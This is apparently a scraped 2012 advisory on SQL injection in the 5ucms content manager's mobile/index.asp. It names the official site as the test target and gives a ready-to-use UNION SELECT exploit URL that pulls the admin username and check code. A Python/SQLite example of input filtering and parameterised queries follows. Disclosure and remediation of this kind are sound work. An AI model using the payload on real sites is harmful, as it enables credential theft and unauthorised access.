5ucms latest version SQL injection vulnerability

ID MYHACK58:62201234116
Type myhack58
Reporter Anonymous
Modified 2012-06-17T00:00:00


Vulnerable file: /mobile/index.asp

Vulnerability description: the variable id is not filtered, resulting in SQL injection.

Vulnerability test: http://www.5u.hk/ (official site)

Proof of vulnerability ↓

[Image: QQ screenshot 20120606183325.jpg]

Vulnerability EXP↓

/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin

Fix ↓

Filtration and...
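
One way to filter the id variable, written here as an added Python/SQLite model rather than 5ucms's own ASP code: the unfiltered lookup is shown beside a version that accepts only digits and binds the value as a query parameter. The table names, column names and sample rows are constructed for the demonstration and are not taken from 5ucms.

```python
import sqlite3
from urllib.parse import unquote

# id value from the advisory's request, URL-decoded (Access syntax).
ADVISORY_ID = unquote("1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin")
# Constructed SQLite-dialect equivalent so the in-memory demo can run it.
DEMO_ID = "1 UNION SELECT username, checkcode FROM admin"

def make_db():
    """Constructed stand-in database; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, checkcode TEXT);
        INSERT INTO content VALUES (1, 'Hello', 'First post');
        INSERT INTO admin VALUES ('admin', 'constructed-value');
    """)
    return db

def view_unfiltered(db, raw_id):
    """The flaw described above: id is pasted into the SQL text as-is."""
    return db.execute("SELECT title, body FROM content WHERE id=" + raw_id).fetchall()

def parse_id(raw_id):
    """Allow-list filter: 1 to 9 ASCII digits, otherwise None."""
    if raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9:
        return int(raw_id)
    return None

def view_filtered(db, raw_id):
    """Validate id, then bind it as a parameter instead of concatenating."""
    article_id = parse_id(raw_id)
    if article_id is None:
        return None  # caller should answer with an error page, not run SQL
    return db.execute("SELECT title, body FROM content WHERE id=?", (article_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("unfiltered:", view_unfiltered(db, DEMO_ID))
    print("filtered:  ", view_filtered(db, DEMO_ID))
    print("advisory id accepted by filter?", parse_id(ADVISORY_ID) is not None)
```

The digit check alone stops this request; binding the parameter as well keeps the query safe if the validation is later loosened or bypassed.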

I held on to this for a long time and did nothing with it, so I am putting it out. I hope it is only used for testing, not for malicious use.